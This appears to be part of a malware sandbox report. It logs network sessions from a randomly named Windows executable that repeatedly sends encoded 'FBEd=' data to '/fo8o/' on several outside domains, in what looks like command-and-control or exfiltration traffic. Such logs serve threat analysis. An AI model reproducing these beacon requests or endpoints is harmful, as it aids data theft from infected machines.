49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 52 79 63 4b 5a 32 6c 59 48 46 65 59 30 74 79 4a 6d 51 43 79 6f 59 4e 67 31 39 38 42 77 46 61 2b 31 41 59 6d 4e 71 6e 4e 6b 72 65 4f 62 6b 54 38 39 77 4a 57 59 4c 68 45 35 2f 2f 51 45 39 6d 4a 31 39 31 61 52 68 74 77 7a 67 6c 4a 30 4b 4d 57 6e 4c 47 65 55 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 844<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RycKZ2lYHFeY0tyJmQCyoYNg198BwFa+1AYmNqnNkreObkT89wJWYLhE5//QE9mJ191aRhtwzglJ0KMWnLGeUg==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the information youre looking for. From gen
May 8, 2024 10:50:27.192334890 CEST	1289	IN	Data Raw: 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 20 68 61 73 20 69 74 20 Data Ascii: eral topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_log
May 8, 2024 10:50:27.192343950 CEST	1289	IN	Data Raw: 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 Data Ascii: ,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height1062:1.15;margin:0}button,i
May 8, 2024 10:50:27.192352057 CEST	1289	IN	Data Raw: 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a Data Ascii: play:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#262626;text-align:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.containe
May 8, 2024 10:50:27.192363977 CEST	1289	IN	Data Raw: 74 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 69 6d 61 67 65 73 2f 62 75 6c 6c 65 74 5f 6a 75 73 74 61 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 Data Ascii: t:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-deco
May 8, 2024 10:50:27.192377090 CEST	1289	IN	Data Raw: 69 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 62 75 79 62 6f 78 7b 64 69 73 70 6c 61 79 3a Data Ascii: ine}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{col
May 8, 2024 10:50:27.192385912 CEST	1289	IN	Data Raw: 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 7b 74 65 78 74 Data Ascii: r-contact-us__content-link{font-size:10px;color:#555}.container-privacyPolicy{text-align:center}.container-privacyPolicy__content{display:inline-block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{p
May 8, 2024 10:50:27.192406893 CEST	1259	IN	Data Raw: 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 35 35 30 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 Data Ascii: isplay:inline-block;max-width:550px}.cookie-modal-window__content-text{line-height:1.5em}.cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content
May 8, 2024 10:50:27.192418098 CEST	1289	IN	Data Raw: 41 45 43 0d 0a 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 73 77 69 74 63 68 20 69 6e 70 75 74 7b 6f 70 61 63 69 74 79 3a 30 3b 77 69 64 74 68 3a Data Ascii: AECder-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;b
May 8, 2024 10:50:27.192447901 CEST	1289	IN	Data Raw: 73 65 2c 22 63 64 6e 48 6f 73 74 22 3a 22 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e Data Ascii: se,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_RycKZ2lYHFeY0tyJmQCyoYNg198BwFa+1AYmNqnNkreObkT8
May 8, 2024 10:50:27.503421068 CEST	1289	IN	Data Raw: 4d 6a 41 31 43 54 45 30 4e 6a 45 77 4d 54 59 78 4e 77 6b 34 4d 53 34 78 4f 44 45 75 4e 6a 41 75 4f 54 49 4a 4d 41 25 33 44 25 33 44 22 2c 22 61 6c 74 65 72 6e 61 74 65 22 3a 22 4f 41 6c 6c 4f 54 45 78 4d 47 45 35 4e 54 51 7a 4d 6a 45 33 4e 6a 63 Data Ascii: MjA1CTE0NjEwMTYxNwk4MS4xODEuNjAuOTIJMA%3D%3D","alternate":"OAllOTExMGE5NTQzMjE3NjcyZTczZTg4YjlhODk3NDhiOQkxMjEwCTEzCTAJCTUxODY4MDUyOAlyc3NuZXdzY2FzdAkzMDQ5CTEJNQk1OQkxNzE1MTU4MjI3CTAJTgkwCTAJMAkxMjA1CTE0NjEwMTYxNwk4MS4xODEu576NjAuOTIJMA%3D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49732	66.29.149.46	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:41.366661072 CEST	770	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 65 50 4d 64 69 56 42 63 68 63 50 52 57 45 42 34 31 6b 6a 69 69 39 6e 39 47 5a 2b Data Ascii: FBEd=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIePMdiVBchcPRWEB41kjii9n9GZ+
May 8, 2024 10:50:41.581463099 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:41 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49733	66.29.149.46	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:44.854578972 CEST	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 70 7a 41 73 55 6c 37 6a 41 46 57 58 33 6f 6f 5a 72 53 73 76 4a 58 4a 50 64 67 77 3d 3d Data Ascii: FBEd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhpzAsUl7jAFWX3ooZrSsvJXJPdgw==
May 8, 2024 10:50:45.065354109 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:44 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49734	66.29.149.46	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:47.588238001 CEST	1807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 74 78 4d 77 32 39 50 65 42 6b 57 43 67 36 39 42 57 38 2b 68 53 39 6e 52 2f 70 76 2f 72 6c 59 78 55 69 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 57 [TRUNCATED] Data Ascii: FBEd=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMytxMw29PeBkWCg69BW8+hS9nR/pv/rlYxUi0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MNLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvUh4YgEGGneh5yUsf1M5awhSKDkhkpwe8S4VpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNbNQpjD2WsuHCTmWr3rLr5LHgzcN9xxzaNN806cSXciwIr1Tez0Zxov0TStDuGDPRSmGde/8okV45DSGyV7XCftj9ukapNE6qYEEzyeLs/5aj26YgFjK95s9e9ZT3YbtOumquX2VAEkDH+D53UCrP0ueFLgx6xWkCfKyNhB2D5iOmOR2yiQ3CgpxsCS+RpXyVAr3K0e3OF8znwOAIsS286Lb/Fs2EujjKMYkj9bNwdFYcu0/1yi2xeP38g8mvACZ9MiJRqth0Q3gdhoLIWGj5p4o9ILgiWbe61TFHLUpLM/MpdGLNWrT4EAoRWRLAZ4xmWTP/KhR83J32Tq1TwNhH6bq/nvZXGuO0aG4tyM4uoacI6Gjl6REaPHfjJE/N/PXYNpqtB5mvfHF3dSL0djN9HfvbVq4C5zvZT6i5/jkp3T4jfwNt4OzxFaB6nQTMqYtip758vLnkbpfOPU7gL9J0uNlKSU5XiXxCQQEaHVOAZAvnjpS0SEeXcwf/tkXxwT200N14O4EtETGzxSl8 [TRUNCATED]
May 8, 2024 10:50:47.799176931 CEST	637	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:47 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49735	66.29.149.46	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:50.321676970 CEST	501	OUT	GET /fo8o/?FBEd=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hbvgW/E7EGitLXVKOGZWUueXafmCZ6g==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.techchains.info Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:50:50.527709007 CEST	652	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:50 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	49736	195.110.124.133	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:56.555685997 CEST	788	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 